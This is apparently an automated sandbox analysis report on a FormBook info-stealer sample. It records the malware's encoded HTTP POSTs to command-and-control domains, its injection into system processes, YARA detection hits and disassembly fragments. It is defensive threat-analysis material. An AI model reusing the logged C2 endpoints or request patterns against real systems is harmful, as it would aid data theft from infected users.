                                                                                                                          Data Ascii: )a%Sj]3\BY2f_W.&eTmpx2~Z.]{y.e0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          56192.168.2.65737252.13.151.17980
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:35.377890110 CEST1797OUTPOST /t7t4/ HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.rudemyvague.info
                                                                                                                          Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 32 34 62 61 71 43 6d 4f 41 58 37 41 67 2f 4f 34 2f 56 35 43 39 49 41 50 55 30 78 51 37 45 44 70 6a 32 6d 62 71 76 63 71 38 4f 51 5a 58 71 63 51 69 69 6f 6a 54 32 31 64 2b 64 30 48 51 73 4e 72 36 31 39 72 73 7a 2b 41 47 42 55 33 31 56 69 2f 75 75 72 62 33 42 44 6c 38 59 44 30 52 35 36 30 73 41 48 7a 75 34 6c 6c 69 36 78 38 34 42 77 31 73 6e 67 43 41 5a 6d 55 56 58 47 61 62 37 59 4f 76 6d 6c 54 30 51 71 4d 65 4d 6b 4b 6b 49 70 39 66 6c 32 43 6d 56 7a 5a 6b 38 59 6f 46 39 4f 62 4f 76 4f 63 6c 75 62 36 52 65 34 76 5a 6a 42 73 56 6f 41 6a 2b 59 55 59 75 54 53 42 66 6c 30 64 39 70 76 41 58 37 71 4b 41 2b 6c 30 41 6e 67 76 6d 67 77 7a 48 74 6c 51 46 53 4e 32 63 77 63 76 6a 54 51 31 69 45 30 54 76 4f 74 66 47 45 79 6b 54 6d 4c 66 44 58 47 4a 5a 37 4b 34 74 2f 57 72 44 73 79 44 57 44 2b 53 33 7a 57 63 7a 71 49 63 30 4b 4b 33 53 2f 77 48 65 6e 6e 50 64 31 32 42 67 61 41 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9v24baqCmOAX7Ag/O4/V5C9IAPU0xQ7EDpj2mbqvcq8OQZXqcQiiojT21d+d0HQsNr619rsz+AGBU31Vi/uurb3BDl8YD0R560sAHzu4lli6x84Bw1sngCAZmUVXGab7YOvmlT0QqMeMkKkIp9fl2CmVzZk8YoF9ObOvOclub6Re4vZjBsVoAj+YUYuTSBfl0d9pvAX7qKA+l0AngvmgwzHtlQFSN2cwcvjTQ1iE0TvOtfGEykTmLfDXGJZ7K4t/WrDsyDWD+S3zWczqIc0KK3S/wHennPd12BgaAJ6HS7nX/1OzagSOwyFWMw08ZVDuk7P43gX5+QmE0CDuxTPLC1vCAPs/rJdZ5kMVrGD4GLTXct0O/g0T6tMss/IB/wwe9V4n7LdyL3nQYllCPWaIgadLqaUHOph6NUmjX1Dz7t7ER/8zNh6dKUpOVfYS8HYYNvzpSwDOOo8oM0n13/KakYgD/l0QvtyicOUMKLd+4kUZQHxzSeKOHR+6s607H+ad038W5ee7hcyeY0qD06Kaqczn+nc4SnuoYLo2jTNZK/sQ/S7rdnW2eEmRp8J02Y4qUZzdk6vAWx947tmAw0YeH/qw1cCiF1mvbX2JH13go3aj43M0aqSRu9mURRKm7XeqzkkLVYZzOFeCIAsDi1xObS8hvhBC4KAYWpgD57GqX5XM9wWjP0MrgXgWomzI4X6SKS+xDJhxFdzevwEAhQCwWbgIHevMYgP+LBQDS6PANO6UTRD00r9eCEvcbvPdmequTBXagVG0EyDqyHj3LNO38rVUTJj+vayIUmfr8mIJnLvYlnRF5w/RW4ICqJG129wm+wX5XnN3CcrzDPoymEeQJsC1xTJ+3ySX9aQZQOPfB69JmmssBW0zTWHSP3Q5ugHrOxL7Z0IsvqYi2c/E9e4Nc6LDsnkroQI5ic5hVpJ1g1WCZ7wRthTOu+K9ozliyi3elSfNAAK [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:28:35.945580006 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:35 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                          Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS'QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
                                                                                                                          Oct 21, 2024 17:28:35.945635080 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                          Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          57192.168.2.65737352.13.151.17980
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:37.922907114 CEST499OUTGET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:28:38.488610983 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:38 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Data Raw: 37 36 35 0d 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 70 70 72 65 73 73 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 73 74 79 6c 65 3e 0a 0a 62 6f 64 79 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 7d 0a 0a 68 31 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 62 67 31 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 31 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 32 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 32 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 33 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 [TRUNCATED]
                                                                                                                          Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
                                                                                                                          Oct 21, 2024 17:28:38.488630056 CEST1210INData Raw: 6d 67 2f 66 6f 6e 64 38 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 39 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 39 2e 77 65
                                                                                                                          Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          58192.168.2.657374103.106.67.11280
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:51.659837961 CEST757OUTPOST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 49 57 37 6f 31 6c 46 39 77 7a 79 7a 69 58 68 61 65 46 61 67 63 4c 4b 30 71 6b 2b 61 54 39 6a 68 38 46 2b 70 39 36 59 4d 6c 72 74 57 74 68 6d 78 32 46 46 5a 74 43 71 36 34 49 6f 56 42 4e 2b 32 44 62 72 6c 71 4e 38 62 6c 49 6f 31 71 68 4c 56 2b 58 47 76 31 4b 47 58 47 75 41 5a 61 6c 6b 4e 2b 31 52 77 51 6a 7a 35 54 6b 4b 44 78 4d 4d 62 6f 53 47 45 50 7a 52 46 35 4d 35 4b 4e 38 48 76 65 34 58 37 44 4d 66 76 51 7a 46 48 6c 61 31 75 33 56 43 69 73 39 72 6d 35 79 76 6f 77 6b 61 77 74 45 39 4c 6c 46 66 32 78 31 4f 62 71 57 54 4f 43 72 34 30 79 70 57 45 34 6f 54 42 75 66 6d
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCis9rm5yvowkawtE9LlFf2x1ObqWTOCr40ypWE4oTBufm
                                                                                                                          Oct 21, 2024 17:28:52.252650976 CEST245INHTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:52 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          59192.168.2.657375103.106.67.11280
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:54.206171036 CEST781OUTPOST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 70 6a 68 63 56 2b 71 38 36 59 43 46 72 74 43 39 68 5a 2b 57 46 43 5a 74 48 66 36 34 45 6f 56 42 5a 2b 32 42 44 72 6c 64 35 6a 4a 46 49 71 2b 4b 68 56 52 2b 58 47 76 31 4b 47 58 47 72 72 5a 65 78 6b 4e 4e 74 52 78 30 33 77 7a 7a 6b 46 45 78 4d 4d 52 49 53 43 45 50 7a 7a 46 39 4d 54 4b 50 30 48 76 65 49 58 37 53 4d 59 36 41 7a 66 4b 46 61 67 68 6e 45 30 74 75 31 76 6b 4a 79 39 39 58 34 42 78 62 46 6e 58 57 46 38 6b 68 56 4d 62 6f 4f 68 4f 69 72 53 32 79 52 57 57 76 6b 30 4f 61 36 46 4e 41 70 76 46 65 39 79 67 56 53 36 50 37 52 4e 53 33 63 42 67 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahpjhcV+q86YCFrtC9hZ+WFCZtHf64EoVBZ+2BDrld5jJFIq+KhVR+XGv1KGXGrrZexkNNtRx03wzzkFExMMRISCEPzzF9MTKP0HveIX7SMY6AzfKFaghnE0tu1vkJy99X4BxbFnXWF8khVMboOhOirS2yRWWvk0Oa6FNApvFe9ygVS6P7RNS3cBgA==
                                                                                                                          Oct 21, 2024 17:28:54.807488918 CEST245INHTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:54 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:11:24:11
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\BL.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\BL.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'313'649 bytes
                                                                                                                          MD5 hash:0084FA11E77425FD332E10928312F760
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:11:24:12
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\BL.exe"
                                                                                                                          Imagebase:0x220000
                                                                                                                          File size:46'504 bytes
                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:11:24:22
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe"
                                                                                                                          Imagebase:0x480000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:11:24:24
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                                                                                          Imagebase:0x630000
                                                                                                                          File size:187'904 bytes
                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:11:24:38
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe"
                                                                                                                          Imagebase:0x480000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:11:24:54
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                          Imagebase:0x7ff728280000
                                                                                                                          File size:676'768 bytes
                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3%
                                                                                                                            Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                            Signature Coverage:4.7%
                                                                                                                            Total number of Nodes:1434
                                                                                                                            Total number of Limit Nodes:37
                                                                                                                            execution_graph 84867 429212 84872 410b90 84867->84872 84873 410b9a __write_nolock 84872->84873 84892 41171a 84873->84892 84877 410c66 _wcsncat 84907 413e3c 84877->84907 84880 41171a 75 API calls 84881 410ca3 _wcscpy 84880->84881 84882 410cd1 RegOpenKeyExW 84881->84882 84883 429bc3 RegQueryValueExW 84882->84883 84884 410cf7 84882->84884 84885 429cd9 RegCloseKey 84883->84885 84887 429bf2 _wcscat _wcslen _wcsncpy 84883->84887 84889 411421 84884->84889 84886 41171a 75 API calls 84886->84887 84887->84886 84888 429cd8 84887->84888 84888->84885 84982 4113e5 84889->84982 84891 41142e 84894 411724 84892->84894 84895 410c31 GetModuleFileNameW 84894->84895 84898 411740 std::bad_alloc::bad_alloc 84894->84898 84910 4138ba 84894->84910 84928 411afc 6 API calls __decode_pointer 84894->84928 84904 413db0 84895->84904 84900 411421 __cinit 74 API calls 84898->84900 84902 411766 84898->84902 84899 411770 84930 41805b RaiseException 84899->84930 84900->84902 84929 4116fd 67 API calls std::exception::exception 84902->84929 84903 41177e 84940 413b95 84904->84940 84970 41abec 84907->84970 84911 41396d 84910->84911 84921 4138cc 84910->84921 84938 411afc 6 API calls __decode_pointer 84911->84938 84913 413973 84939 417f23 67 API calls __getptd_noexit 84913->84939 84918 413929 RtlAllocateHeap 84918->84921 84919 4138dd 84919->84921 84931 418252 67 API calls 2 library calls 84919->84931 84932 4180a7 67 API calls 7 library calls 84919->84932 84933 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84919->84933 84921->84918 84921->84919 84922 413959 84921->84922 84925 41395e 84921->84925 84927 413965 84921->84927 84934 41386b 67 API calls 4 library calls 84921->84934 84935 411afc 6 API calls __decode_pointer 84921->84935 84936 417f23 67 API calls __getptd_noexit 84922->84936 84937 417f23 67 API calls __getptd_noexit 84925->84937 84927->84894 84928->84894 84929->84899 84930->84903 84931->84919 84932->84919 84934->84921 84935->84921 84936->84925 84937->84927 84938->84913 84939->84927 84941 413bae 84940->84941 84942 413c2f 84940->84942 84941->84942 84955 413c1d 84941->84955 84962 41ab19 67 API calls __wcstombs_l_helper 84941->84962 84943 413d60 84942->84943 84944 413d7b 84942->84944 84966 417f23 67 API calls __getptd_noexit 84943->84966 84968 417f23 67 API calls __getptd_noexit 84944->84968 84947 413d65 84956 413cfb 84947->84956 84967 417ebb 6 API calls 2 library calls 84947->84967 84950 413d03 84950->84942 84952 413d8e 84950->84952 84950->84956 84951 413cb9 84951->84942 84953 413cd6 84951->84953 84964 41ab19 67 API calls __wcstombs_l_helper 84951->84964 84969 41ab19 67 API calls __wcstombs_l_helper 84952->84969 84953->84942 84953->84956 84957 413cef 84953->84957 84955->84942 84961 413c9b 84955->84961 84963 41ab19 67 API calls __wcstombs_l_helper 84955->84963 84956->84877 84965 41ab19 67 